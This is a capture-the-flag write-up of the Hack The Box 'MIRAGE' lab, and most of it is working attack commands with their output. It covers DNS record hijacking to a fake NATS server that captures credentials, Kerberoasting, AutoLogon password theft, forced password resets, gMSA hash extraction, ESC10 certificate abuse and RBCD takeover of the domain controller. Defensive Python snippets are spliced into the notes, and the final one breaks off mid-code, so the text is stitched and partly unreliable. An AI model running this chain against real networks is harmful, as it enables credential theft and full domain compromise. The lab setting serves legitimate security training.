Here is my note on the MIRAGE box from Hack The Box.
MIRAGE: 10.129.232.163
nmapAutomator.sh --host 10.129.232.163 --type All
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-31 22:35:07Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# nxc ldap dc01.mirage.htb -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoasting output.txt
LDAP dc01.mirage.htb 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAP dc01.mirage.htb 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP dc01.mirage.htb 389 DC01 Bypassing disabled account krbtgt
LDAP dc01.mirage.htb 389 DC01 [*] Total of records returned 1
LDAP dc01.mirage.htb 389 DC01 sAMAccountName: nathan.aadam memberOf: CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb pwdLastSet: 2025-06-23 21:18:18.584667 lastLogon:2025-07-04 20:01:43.511763
LDAP dc01.mirage.htb 389 DC01 $krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$0df49e17e59bfec7bb1b5cc3f8cc526d$[SNIP]
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
nathan.aadam:3edc#EDC3
nathan.aadam is a remote management user = USER-SHELL !
nxc ldap dc01.mirage.htb -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' --dns-server 10.129.232.163 -k --bloodhound --collection All
nxc ldap dc01.mirage.htb -d mirage.htb -u nathan.aadam -p '3edc#EDC3' --dns-server 10.129.232.163 -k --bloodhound --collection All
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
2049/tcp open nfs 2-4 (RPC #100003)
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# showmount -e 10.129.232.163
Export list for 10.129.232.163:
/MirageReports (everyone)
sudo mount -t nfs 10.129.232.163:/MirageReports . -o nolock
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# ls
Mirage nmap nmapAutomator_10.129.232.163_All.txt recon
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# cd Mirage
ls
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Mirage]
└─# ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf Mirage_Authentication_Hardening_Report.pdf
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Mirage]
└─# ls -lah
total 18M
drwxrwxrwx 2 nobody nogroup 64 May 26 21:41 .
drwxr-xr-x 5 root root 4.0K Aug 31 21:40 ..
-rwx------ 1 nobody nogroup 8.2M May 20 15:08 Incident_Report_Missing_DNS_Record_nats-svc.pdf
-rwx------ 1 nobody nogroup 9.0M May 26 21:37 Mirage_Authentication_Hardening_Report.pdf
Incident_Report_Missing_DNS_Record_nats-svc.pdf:
nats-svc.mirage.htb = the DNS record went missing (confirmed on dc01.mirage.htb)
Security Consideration:
In development environments, fixed service names such as nats-svc.mirage.htb
are often hardcoded in applications. If the DNS record is missing, some apps
may still attempt to connect to that name. This behavior could be abused by attackers if DNS records are hijacked.
The Security Team should monitor such cases closely to ensure no unauthorized DNS responses are injected or spoofed in the network.
DNS Poisoning (unauthenticated dynamic update re-creates the missing record):
dnsupadate.txt:
server [RHOST]
zone mirage.htb
update delete nats-svc.mirage.htb A
update add nats-svc.mirage.htb 60 A [LHOST]
send
In this case:
server 10.129.232.163
zone mirage.htb
update delete nats-svc.mirage.htb A
update add nats-svc.mirage.htb 60 A 10.10.14.174
send
nsupdate dnsupadate.txt
https://github.com/s4orii/Fake-NATS
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Fake-NATS]
└─# python3 mirage-exploit.py
[!] Use: ./mirage-exploit.py <VPN IP> <MIRAGE IP>
┌──(root㉿kali)-[/home/…/BOXES/MIRAGE/10.129.232.163/Fake-NATS]
└─# python3 mirage-exploit.py 10.10.14.174 10.129.232.163
[+] Creating Fake server info
[+] Configuration Created
[+] Updating DNS Record >:)
[+] Successfully updated >:), DNS for NATS SVC now is 10.10.14.174
[+] Fake NATS on 0.0.0.0:4222 for 60s
[+] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
PING
Dev_Account_A:hx5h7F5554fP@1337!
This credential is for the NATS server, which runs on TCP port 4222.
nats --server nats://mirage.htb:4222 rtt --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
nats stream ls --server nats://mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
nats consumer add auth_logs reader --pull --server nats://mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
nats consumer next auth_logs reader --count=5 --server nats://mirage.htb:4222 --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 4 / str seq: 4 / pending: 1
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
[22:32:06] subj: logs.auth / tries: 1 / cons seq: 5 / str seq: 5 / pending: 0
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message
david.jjackson:pN8kQmn6b86!1234@
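The logs.auth stream above publishes cleartext passwords, and the NATS CONNECT line carries the client's own credentials. As an added example (not code from the box or from any tool used in this note), a small Python scanner/redactor for such messages; SECRET_KEYS and the sample messages are constructed assumptions in the same shape as the captured traffic.

```python
import copy
import json

# Field names whose values should never reach a log stream in cleartext (assumed list).
SECRET_KEYS = {"password", "pass", "passwd", "pwd", "secret", "token", "api_key"}

# Constructed sample messages in the shape of the logs.auth stream and of the captured
# NATS CONNECT line (credential values here are made up, not the box's).
SAMPLE_STREAM = [
    ("logs.auth", 1, '{"user":"david.jjackson","password":"Example!Pass1","ip":"10.10.10.20"}'),
    ("logs.auth", 2, '{"user":"svc_backup","ip":"10.10.10.21","ctx":{"token":"tok-abc123"}}'),
    ("logs.auth", 3, '{"user":"alice","ip":"10.10.10.22","result":"ok"}'),
    ("logs.auth", 4, "not json at all"),
]
SAMPLE_CONNECT = ('CONNECT {"verbose":false,"user":"Dev_Account_A","pass":"ExamplePass",'
                  '"tls_required":false,"lang":"go","protocol":1}')


def parse_nats_connect(line):
    """Parse a NATS client 'CONNECT {json}' protocol line into a dict; None for other verbs."""
    verb, _, body = line.strip().partition(" ")
    if verb.upper() != "CONNECT":
        return None
    return json.loads(body)


def find_secrets(obj, path=""):
    """Return JSON paths (e.g. 'ctx.token') of secret-named keys that hold a non-empty value."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = f"{path}.{key}" if path else key
            if key.lower() in SECRET_KEYS and value not in (None, ""):
                hits.append(here)
            hits.extend(find_secrets(value, here))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            hits.extend(find_secrets(value, f"{path}[{i}]"))
    return hits


def redact(obj):
    """Deep copy of obj with every secret-named field replaced by '[REDACTED]'."""
    if isinstance(obj, dict):
        return {k: "[REDACTED]" if k.lower() in SECRET_KEYS else redact(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return copy.deepcopy(obj)


def audit_stream(messages):
    """Scan (subject, seq, raw_json) messages; one (subject, seq, user, path) per leaked field."""
    findings = []
    for subject, seq, raw in messages:
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # non-JSON payloads are skipped rather than crashing the scan
        for path in find_secrets(event):
            findings.append((subject, seq, event.get("user", "?"), path))
    return findings
```

Run `audit_stream` over messages pulled with `nats consumer next`, and apply `redact` in the publisher before anything reaches a stream that other accounts can read.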
faketime -f $(ntpdate -q mirage.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# nxc smb dc01.mirage.htb -d mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
Mirage_Authentication_Hardening_Report.pdf:
So Kerberos authentication only, no NTLM authentication anymore.
ad-security@mirage.htb
/etc/krb5.conf:
[libdefaults]
default_realm = MIRAGE.HTB
# The following krb5.conf variables are only for MIT Kerberos.
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
# The following libdefaults parameters are only for Heimdal Kerberos.
fcc-mit-ticketflags = true
[realms]
MIRAGE.HTB = {
kdc = 10.129.232.163
admin_server = 10.129.232.163
}
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
4222/tcp open vrml-multi-use
5985/tcp open wsman
nathan.aadam:3edc#EDC3
getTGT.py mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip 10.129.232.163
export KRB5CCNAME=nathan.aadam.ccache
evil-winrm -i dc01.mirage.htb -r mirage.htb
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# getTGT.py mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip 10.129.232.163
/home/kali/BOXES/MIRAGE/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in nathan.aadam.ccache
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# export KRB5CCNAME=nathan.aadam.ccache
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> whoami
mirage\nathan.aadam
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> whoami
mirage\nathan.aadam
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> hostname
dc01
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> dir
Directory: C:\Users\nathan.aadam\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/4/2025 1:01 PM 2312 Microsoft Edge.lnk
-ar--- 8/31/2025 3:26 PM 34 user.txt
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
nathan.aadam -> Administrator
WINPEAS:
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : MIRAGE
DefaultUserName : mark.bbond
DefaultPassword : 1day@atime
mark.bbond:1day@atime
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
REG QUERY HKCU /F "DefaultPassword" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Bloodhound Data:
mark.bbond -> Member Of -> IT_SUPPORT -> ForceChangePassword -> javier.mmarshall # With bloodyAD + Kerberos; the javier.mmarshall account is disabled, so enable it first
getTGT.py mirage.htb/mark.bbond:'1day@atime' -dc-ip 10.129.232.163
export KRB5CCNAME=mark.bbond.ccache
net rpc password "javier.mmarshall" "Password123" -U "MIRAGE"/"mark.bbond"%"1day@atime" -S "dc01.mirage.htb"
Didn't work because the javier.mmarshall account is disabled.
We can enable it again with bloodyAD.
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall userAccountControl -v 512
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall logonHours
bloodyAD --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set password javier.mmarshall 'Password123@'
# Make sure to use the current version of bloodyAD.
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall userAccountControl -v 512
[+] javier.mmarshall's userAccountControl has been updated
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set object javier.mmarshall logonHours
[!] Attribute encoding not supported for logonHours with bytes attribute type, using raw mode
[+] javier.mmarshall's logonHours has been updated
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host dc01.mirage.htb -d mirage.htb -u 'mark.bbond' -p '1day@atime' -k set password javier.mmarshall 'Password123@'
[+] Password changed successfully!
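The two attributes changed above (userAccountControl and logonHours) decide whether the account can log on at all. As an added example (not part of bloodyAD or this note's tooling), a Python decoder for both attributes plus a diff of "what changed to make a blocked account usable", which is the pattern to look for in 4738/5136 events; the snapshots at the bottom are constructed.

```python
# Subset of userAccountControl bits from the AD schema documentation.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
DAYS = ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]


def decode_uac(value):
    """Names of the known bits set in a userAccountControl integer (514 = disabled user)."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def decode_logon_hours(blob):
    """logonHours: 21 bytes = 168 bits, one per hour of the week in UTC starting Sunday 00:00,
    least-significant bit first; a set bit allows logon. Absent/empty attribute = no restriction."""
    if not blob:
        return {"restricted": False, "allowed_hours": 168, "never": False, "by_day": {}}
    if len(blob) != 21:
        raise ValueError("logonHours must be exactly 21 bytes")
    allowed = [(blob[h // 8] >> (h % 8)) & 1 == 1 for h in range(168)]
    return {
        "restricted": not all(allowed),
        "allowed_hours": sum(allowed),
        "never": not any(allowed),
        "by_day": {DAYS[d]: sum(allowed[d * 24:(d + 1) * 24]) for d in range(7)},
    }


def account_status(sam, uac, logon_hours):
    """Summarise whether an account can currently log on and, if not, why."""
    reasons = []
    flags = decode_uac(uac)
    if "ACCOUNTDISABLE" in flags:
        reasons.append("disabled (userAccountControl bit 0x2)")
    if "LOCKOUT" in flags:
        reasons.append("locked out")
    hours = decode_logon_hours(logon_hours)
    if hours["never"]:
        reasons.append("logonHours denies every hour")
    return {"sam": sam, "flags": flags, "hours": hours, "can_logon": not reasons, "reasons": reasons}


def enablement_changes(before, after):
    """Changes between two snapshots that turn a blocked account into a usable one."""
    changes = []
    if "ACCOUNTDISABLE" in before["flags"] and "ACCOUNTDISABLE" not in after["flags"]:
        changes.append("account enabled")
    if before["hours"]["never"] and not after["hours"]["never"]:
        changes.append("logonHours restriction lifted")
    if not before["can_logon"] and after["can_logon"]:
        changes.append("account became usable")
    return changes


if __name__ == "__main__":
    # Constructed snapshots: disabled user with an all-zero logonHours, then the enabled state.
    before = account_status("javier.mmarshall", 514, bytes(21))
    after = account_status("javier.mmarshall", 512, None)
    print(before["reasons"], "->", enablement_changes(before, after))
```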
┌──(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163/BLOOD]
└─# nxc smb dc01.mirage.htb -d mirage.htb -u javier.mmarshall -p 'Password123@' -k
SMB dc01.mirage.htb 445 dc01 [*] x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False)
SMB dc01.mirage.htb 445 dc01 [+] mirage.htb\javier.mmarshall:Password123@
javier.mmarshall -> ReadGMSAPassword -> MIRAGE-SERVICE$
bloodyAD --host "10.129.232.163" -d "mirage.htb" -u "javier.mmarshall" -p "Password123@" get object MIRAGE-SERVICE$ --attr msDS-ManagedPassword -k
python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host "dc01.mirage.htb" --dc-ip 10.129.232.163 -d "mirage.htb" -u "javier.mmarshall" -p "Password123@" -k get object MIRAGE-SERVICE$ --attr msDS-ManagedPassword
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/bloodyAD/bloodyAD.py --host "dc01.mirage.htb" --dc-ip 10.129.232.163 -d "mirage.htb" -u "javier.mmarshall" -p "Password123@" -k get object MIRAGE-SERVICE$ --attr msDS-ManagedPassword
distinguishedName: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:7a77d15fb5a4b7035ef2524b1cc4142f
msDS-ManagedPassword.B64ENCODED: 9jszGNTmy77qjkjRxDnCu4oLGZj4ETQ96iw5RZHonL/BORDMGN0o7nHJs3e+wlciM6bCHWPQ5s4Y+Cd96Ax2SHetWsgJiOfJpyuksNXJRNNh3tOOon+RUSYUll5LN4SVE+cQEOiHwQ+im7Gad2Mw29dZPBxKKFzNaXKI6CD30C+egdJOL6q5KqbICurF50J3BJg4viq+s4rhb+iIYKqnFEZSvkTSxNgf9qpBRmBIwPIIpbBJ39XsoNQVN2IKf3KO/yuuOmN0lXVOp5T2OXceO58juAoCHbFdkUkkKXoosp1caCaePaNsrDOrpmKnj1k7V7bLlsxl16oUa8xPohJQFA==
Mirage-Service$:7a77d15fb5a4b7035ef2524b1cc4142f
ESC10 Attack NOTES:
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# evil-winrm -i dc01.mirage.htb -r mirage.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL'
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
EventLogging REG_DWORD 0x1
CertificateMappingMethods REG_DWORD 0x4
CertificateMappingMethods = 0x4 means Schannel maps certificates by UPN only, which is the weak mapping behind the ESC10 AD CS attack (the KB5014754 default is 0x18).
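Both registry findings in this note (the AutoLogon DefaultPassword under Winlogon and the SCHANNEL CertificateMappingMethods value here) can be checked from saved `reg query` output. As an added example, not code from the box or from any tool above, a Python parser for that output with an audit of the two keys plus the related Kdc StrongCertificateBindingEnforcement value; the sample output is constructed in the format `reg query` prints.

```python
import re

# Constructed reg query output (same layout as the real command prints; values are made up).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
    EventLogging    REG_DWORD    0x1
    CertificateMappingMethods    REG_DWORD    0x4

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
    StrongCertificateBindingEnforcement    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EXAMPLE
    DefaultUserName    REG_SZ    svc_kiosk
    DefaultPassword    REG_SZ    Example pass with spaces
"""

VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, raw_value)}} from reg query output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, rtype, raw = m.groups()
            keys[current][name] = (rtype, raw.strip())
    return keys


def dword(values, name, default=None):
    entry = values.get(name)
    return int(entry[1], 16) if entry and entry[0] == "REG_DWORD" else default


def audit(keys):
    """(severity, finding) tuples. Defaults per KB5014754 when a value is absent:
    CertificateMappingMethods 0x18, StrongCertificateBindingEnforcement 1 (compatibility)."""
    findings = []
    for path, values in keys.items():
        leaf = path.rsplit("\\", 1)[-1].lower()
        if leaf == "schannel":
            cmm = dword(values, "CertificateMappingMethods", 0x18)
            if cmm & 0x4:
                findings.append(("high", f"{path}: CertificateMappingMethods=0x{cmm:x} enables UPN "
                                         "mapping (ESC10 case 2); reset to 0x18"))
        elif leaf == "kdc":
            if dword(values, "StrongCertificateBindingEnforcement", 1) == 0:
                findings.append(("high", f"{path}: StrongCertificateBindingEnforcement=0 disables "
                                         "SID binding checks (ESC10 case 1); set to 2"))
        elif leaf == "winlogon":
            pw = values.get("DefaultPassword", ("", ""))[1]
            if pw:
                user = values.get("DefaultUserName", ("", "?"))[1]
                findings.append(("high", f"{path}: cleartext AutoLogon password stored for {user}"))
            elif values.get("AutoAdminLogon", ("", "0"))[1] == "1":
                findings.append(("info", f"{path}: AutoAdminLogon enabled, no password in registry"))
    return findings
```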
getTGT.py mirage.htb/Mirage-Service\$ -hashes :7a77d15fb5a4b7035ef2524b1cc4142f
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# getTGT.py mirage.htb/Mirage-Service\$ -hashes :7a77d15fb5a4b7035ef2524b1cc4142f
/home/kali/BOXES/MIRAGE/venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Mirage-Service$.ccache
┌──(venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# export KRB5CCNAME=Mirage-Service$.ccache
certipy account update \
-user 'mark.bbond' \
-upn 'dc01$@mirage.htb' \
-u 'mirage-service$@mirage.htb' \
-k -no-pass \
-dc-ip 10.129.232.163 \
-target dc01.mirage.htb
Request a Certificate (the UPN is reverted afterwards):
export KRB5CCNAME=mark.bbond.ccache
certipy req \
-u 'mark.bbond@mirage.htb' \
-k -no-pass \
-dc-ip 10.129.232.163 \
-target 'dc01.mirage.htb' \
-ca 'mirage-DC01-CA' \
-template 'User'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 11
[*] Successfully requested certificate
[*] Got certificate with UPN 'dc01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
[*] Wrote certificate and private key to 'dc01.pfx'
UPN Reversion:
export KRB5CCNAME=Mirage-Service$.ccache
certipy account update \
-user 'mark.bbond' \
-upn 'mark.bbond@mirage.htb' \
-u 'mirage-service$@mirage.htb' \
-k -no-pass \
-dc-ip 10.129.232.163 \
-target dc01.mirage.htb
LDAP Shell + Resource-Based Constrained Delegation (RBCD):
certipy auth \
-pfx dc01.pfx \
-dc-ip 10.129.232.163 \
-ldap-shell
In the shell:
set_rbcd dc01$ Mirage-Service$
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# klist
Ticket cache: FILE:Mirage-Service$.ccache
Default principal: Mirage-Service$@MIRAGE.HTB
Valid starting Expires Service principal
09/01/2025 08:13:43 09/01/2025 18:13:43 krbtgt/MIRAGE.HTB@MIRAGE.HTB
renew until 09/02/2025 08:13:43
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/MIRAGE/10.129.232.163]
└─# certipy auth \
-pfx dc01.pfx \
-dc-ip 10.129.232.163 \
-ldap-shell
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'dc01$@mirage.htb'
[*] Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.232.163:636'
[*] Authenticated to '10.129.232.163' as: 'u:MIRAGE\\DC01$'
Type help for list of commands
# set_rbcd dc01$ Mirage-Service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000
Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
Mirage-Service$ can now impersonate users on dc01$ via S4U2Proxy
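The chain above leaves a distinctive trail: a 4738 (user account changed) rewriting a user's UPN to a machine account name, a 4887 (certificate issued) for that UPN, the UPN put back, then a 5136 (directory object modified) on the DC's msDS-AllowedToActOnBehalfOfOtherIdentity. As an added example, not code from this note or any tool in it, Python correlation logic over constructed, simplified event dicts (field names are a reduced form of the real event data, not raw XML).

```python
from datetime import datetime, timedelta

# Constructed, simplified security events mirroring the chain in this note.
EVENTS = [
    {"id": 4738, "t": "2025-09-01T08:15:00", "actor": "Mirage-Service$", "target": "mark.bbond",
     "attr": "User Principal Name", "old": "mark.bbond@mirage.htb", "new": "dc01$@mirage.htb"},
    {"id": 4887, "t": "2025-09-01T08:16:10", "actor": "mark.bbond", "template": "User",
     "upn": "dc01$@mirage.htb"},
    {"id": 4738, "t": "2025-09-01T08:17:00", "actor": "Mirage-Service$", "target": "mark.bbond",
     "attr": "User Principal Name", "old": "dc01$@mirage.htb", "new": "mark.bbond@mirage.htb"},
    {"id": 5136, "t": "2025-09-01T08:20:00", "actor": "DC01$",
     "dn": "CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb",
     "attr": "msDS-AllowedToActOnBehalfOfOtherIdentity", "op": "Value Added"},
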